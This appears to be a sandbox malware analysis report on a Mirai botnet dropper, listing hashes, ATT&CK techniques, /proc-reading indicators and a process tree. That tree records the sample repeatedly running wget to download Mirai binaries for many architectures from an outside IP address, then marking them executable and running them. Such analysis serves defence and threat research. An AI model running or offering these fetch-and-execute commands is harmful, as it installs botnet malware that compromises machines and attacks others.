ed902957efb11382546f2cff80e5284832f7f53c4e2b82b9d181c1f3ef65513f

Analysis

max time kernel
6979s
max time network
146s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20221111-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20221111-enkernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
31/01/2023, 12:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3a642e2d4e682dbd47747e5e6313b3a1cd089dcd
Size

2KB
MD5

8679646f1c0709c8cb09d407f4cd5c45
SHA1

3a642e2d4e682dbd47747e5e6313b3a1cd089dcd
SHA256

ed902957efb11382546f2cff80e5284832f7f53c4e2b82b9d181c1f3ef65513f
SHA512

a4de6e93f637fb98905af32bed13a379234dda2c8c9c238c3f6f62d010e9b1fcf07cd34bfe690be2c0275ea9147c003d29a53492ef268946ac889297f550e95f

Score

9^/10

discovery

Malware Config

Signatures

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046

Enumerates active TCP sockets 1 TTPs 8 IoCs

Gets active TCP sockets from /proc virtual filesystem.

System Network Connections Discovery

T1049

description	ioc	Process
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai

Reads system network configuration 1 TTPs 8 IoCs

Uses contents of /proc filesystem to enumerate network settings.

System Network Configuration Discovery

T1016

description	ioc	Process
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai
/proc/net/tcp	/proc/net/tcp	mirai

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
/proc/285/fd	/proc/285/fd	mirai
/proc/563/fd	/proc/563/fd	mirai
/proc/584/fd	/proc/584/fd	mirai
/proc/345/fd	/proc/345/fd	mirai
/proc/349/fd	/proc/349/fd	mirai
/proc/410/fd	/proc/410/fd	mirai
/proc/427/fd	/proc/427/fd	mirai
/proc/220/fd	/proc/220/fd	mirai
/proc/285/fd	/proc/285/fd	mirai
/proc/582/fd	/proc/582/fd	mirai
/proc/280/fd	/proc/280/fd	mirai
/proc/754/fd	/proc/754/fd	mirai
/proc/344/fd	/proc/344/fd	mirai
/proc/777/fd	/proc/777/fd	mirai
/proc/344/fd	/proc/344/fd	mirai
/proc/345/fd	/proc/345/fd	mirai
/proc/786/fd	/proc/786/fd	mirai
/proc/250/fd	/proc/250/fd	mirai
/proc/737/fd	/proc/737/fd	mirai
/proc/344/fd	/proc/344/fd	mirai
/proc/355/fd	/proc/355/fd	mirai
/proc/	/proc/	mirai
/proc/584/fd	/proc/584/fd	mirai
/proc/1/fd	/proc/1/fd	mirai
/proc/1/fd	/proc/1/fd	mirai
/proc/563/fd	/proc/563/fd	mirai
/proc/410/fd	/proc/410/fd	mirai
/proc/584/fd	/proc/584/fd	mirai
/proc/793/fd	/proc/793/fd	mirai
/proc/348/fd	/proc/348/fd	mirai
/proc/1/fd	/proc/1/fd	mirai
/proc/330/fd	/proc/330/fd	mirai
/proc/582/fd	/proc/582/fd	mirai
/proc/250/fd	/proc/250/fd	mirai
/proc/410/fd	/proc/410/fd	mirai
/proc/362/fd	/proc/362/fd	mirai
/proc/428/fd	/proc/428/fd	mirai
/proc/563/fd	/proc/563/fd	mirai
/proc/347/fd	/proc/347/fd	mirai
/proc/349/fd	/proc/349/fd	mirai
/proc/330/fd	/proc/330/fd	mirai
/proc/330/fd	/proc/330/fd	mirai
/proc/	/proc/	mirai
/proc/220/fd	/proc/220/fd	mirai
/proc/348/fd	/proc/348/fd	mirai
/proc/407/fd	/proc/407/fd	mirai
/proc/	/proc/	mirai
/proc/280/fd	/proc/280/fd	mirai
/proc/347/fd	/proc/347/fd	mirai
/proc/428/fd	/proc/428/fd	mirai
/proc/428/fd	/proc/428/fd	mirai
/proc/344/fd	/proc/344/fd	mirai
/proc/584/fd	/proc/584/fd	mirai
/proc/220/fd	/proc/220/fd	mirai
/proc/280/fd	/proc/280/fd	mirai
/proc/563/fd	/proc/563/fd	mirai
/proc/285/fd	/proc/285/fd	mirai
/proc/778/fd	/proc/778/fd	mirai
/proc/428/fd	/proc/428/fd	mirai
/proc/1/fd	/proc/1/fd	mirai
/proc/345/fd	/proc/345/fd	mirai
/proc/280/fd	/proc/280/fd	mirai
/proc/344/fd	/proc/344/fd	mirai
/proc/250/fd	/proc/250/fd	mirai

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
/tmp/3a642e2d4e682dbd47747e5e6313b3a1cd089dcd	/tmp/3a642e2d4e682dbd47747e5e6313b3a1cd089dcd	3a642e2d4e682dbd47747e5e6313b3a1cd089dcd

/tmp/3a642e2d4e682dbd47747e5e6313b3a1cd089dcd
/tmp/3a642e2d4e682dbd47747e5e6313b3a1cd089dcd
1⤵
- Writes file to tmp directory
PID:582
- /usr/bin/wget
  wget http://185.212.149.107/mirai.arm4
  2⤵
  PID:583
- /bin/cat
  cat mirai.arm4
  2⤵
  PID:631
- /bin/chmod
  chmod +x 3a642e2d4e682dbd47747e5e6313b3a1cd089dcd mirai netplan_6lzywoh5 systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-resolved.service-zVdWPp systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-timesyncd.service-EVlWiO
  2⤵
  PID:632
- ./mirai
  ./mirai
  2⤵
  PID:633
- /usr/bin/wget
  wget http://185.212.149.107/mirai.arm5
  2⤵
  PID:635
- /bin/cat
  cat mirai.arm5
  2⤵
  PID:710
- /bin/chmod
  chmod +x 3a642e2d4e682dbd47747e5e6313b3a1cd089dcd mirai mirai.arm5 netplan_6lzywoh5 systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-resolved.service-zVdWPp systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-timesyncd.service-EVlWiO
  2⤵
  PID:711
- ./mirai
  ./mirai
  2⤵
  PID:712
- /usr/bin/wget
  wget http://185.212.149.107/mirai.arm6
  2⤵
  PID:714
- /bin/cat
  cat mirai.arm6
  2⤵
  PID:716
- /bin/chmod
  chmod +x 3a642e2d4e682dbd47747e5e6313b3a1cd089dcd mirai mirai.arm5 mirai.arm6 netplan_6lzywoh5 systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-resolved.service-zVdWPp systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-timesyncd.service-EVlWiO
  2⤵
  PID:717
- ./mirai
  ./mirai
  2⤵
  PID:718
- /usr/bin/wget
  wget http://185.212.149.107/mirai.arm7
  2⤵
  PID:720
- /bin/cat
  cat mirai.arm7
  2⤵
  PID:722
- /bin/chmod
  chmod +x 3a642e2d4e682dbd47747e5e6313b3a1cd089dcd mirai mirai.arm5 mirai.arm6 mirai.arm7 netplan_6lzywoh5 systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-resolved.service-zVdWPp systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-timesyncd.service-EVlWiO
  2⤵
  PID:723
- ./mirai
  ./mirai
  2⤵
  PID:724
- /usr/bin/wget
  wget http://185.212.149.107/mirai.x86
  2⤵
  PID:726
- /bin/cat
  cat mirai.x86
  2⤵
  PID:728
- /bin/chmod
  chmod +x 3a642e2d4e682dbd47747e5e6313b3a1cd089dcd mirai mirai.arm5 mirai.arm6 mirai.arm7 mirai.x86 netplan_6lzywoh5 systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-resolved.service-zVdWPp systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-timesyncd.service-EVlWiO
  2⤵
  PID:729
- ./mirai
  ./mirai
  2⤵
  PID:730
- /usr/bin/wget
  wget http://185.212.149.107/mirai.mips
  2⤵
  PID:732
- /bin/chmod
  chmod +x 3a642e2d4e682dbd47747e5e6313b3a1cd089dcd mirai mirai.arm5 mirai.arm6 mirai.arm7 mirai.mips mirai.x86 netplan_6lzywoh5 systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-resolved.service-zVdWPp systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-timesyncd.service-EVlWiO
  2⤵
  PID:736
- ./mirai
  ./mirai
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  - Reads runtime system information
  PID:737
- /usr/bin/wget
  wget http://185.212.149.107/mirai.mipsel
  2⤵
  PID:740
- /bin/chmod
  chmod +x 3a642e2d4e682dbd47747e5e6313b3a1cd089dcd mirai mirai.arm5 mirai.arm6 mirai.arm7 mirai.mips mirai.mipsel mirai.x86 netplan_6lzywoh5 systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-resolved.service-zVdWPp systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-timesyncd.service-EVlWiO
  2⤵
  PID:744
- ./mirai
  ./mirai
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  - Reads runtime system information
  PID:745
- /usr/bin/wget
  wget http://185.212.149.107/mirai.sh4
  2⤵
  PID:748
- /bin/chmod
  chmod +x 3a642e2d4e682dbd47747e5e6313b3a1cd089dcd mirai mirai.arm5 mirai.arm6 mirai.arm7 mirai.mips mirai.mipsel mirai.sh4 mirai.x86 netplan_6lzywoh5 systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-resolved.service-zVdWPp systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-timesyncd.service-EVlWiO
  2⤵
  PID:752
- ./mirai
  ./mirai
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  - Reads runtime system information
  PID:753
- /usr/bin/wget
  wget http://185.212.149.107/mirai.m68k
  2⤵
  PID:756
- /bin/chmod
  chmod +x 3a642e2d4e682dbd47747e5e6313b3a1cd089dcd mirai mirai.arm5 mirai.arm6 mirai.arm7 mirai.m68k mirai.mips mirai.mipsel mirai.sh4 mirai.x86 netplan_6lzywoh5 systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-resolved.service-zVdWPp systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-timesyncd.service-EVlWiO
  2⤵
  PID:760
- ./mirai
  ./mirai
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  - Reads runtime system information
  PID:761
- /usr/bin/wget
  wget http://185.212.149.107/mirai.spc
  2⤵
  PID:764
- /bin/chmod
  chmod +x 3a642e2d4e682dbd47747e5e6313b3a1cd089dcd mirai mirai.arm5 mirai.arm6 mirai.arm7 mirai.m68k mirai.mips mirai.mipsel mirai.sh4 mirai.spc mirai.x86 netplan_6lzywoh5 systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-resolved.service-zVdWPp systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-timesyncd.service-EVlWiO
  2⤵
  PID:768
- ./mirai
  ./mirai
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  - Reads runtime system information
  PID:769
- /usr/bin/wget
  wget http://185.212.149.107/mirai.ppc
  2⤵
  PID:772
- /bin/chmod
  chmod +x 3a642e2d4e682dbd47747e5e6313b3a1cd089dcd mirai mirai.arm5 mirai.arm6 mirai.arm7 mirai.m68k mirai.mips mirai.mipsel mirai.sh4 mirai.spc mirai.x86 netplan_6lzywoh5 systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-resolved.service-zVdWPp systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-timesyncd.service-EVlWiO
  2⤵
  PID:776
- ./mirai
  ./mirai
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  - Reads runtime system information
  PID:777
- /usr/bin/wget
  wget http://185.212.149.107/mirai.i586
  2⤵
  PID:780
- /bin/chmod
  chmod +x 3a642e2d4e682dbd47747e5e6313b3a1cd089dcd mirai mirai.arm5 mirai.arm6 mirai.arm7 mirai.m68k mirai.mips mirai.mipsel mirai.sh4 mirai.spc mirai.x86 netplan_6lzywoh5 systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-resolved.service-zVdWPp systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-timesyncd.service-EVlWiO
  2⤵
  PID:784
- ./mirai
  ./mirai
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  - Reads runtime system information
  PID:785
- /usr/bin/wget
  wget http://185.212.149.107/mirai.i686
  2⤵
  PID:788
- /bin/chmod
  chmod +x 3a642e2d4e682dbd47747e5e6313b3a1cd089dcd mirai mirai.arm5 mirai.arm6 mirai.arm7 mirai.m68k mirai.mips mirai.mipsel mirai.sh4 mirai.spc mirai.x86 netplan_6lzywoh5 systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-resolved.service-zVdWPp systemd-private-05231fcaaee74d259d555d829d744ad3-systemd-timesyncd.service-EVlWiO
  2⤵
  PID:792
- ./mirai
  ./mirai
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  - Reads runtime system information
  PID:793

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Scanning

T1046

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...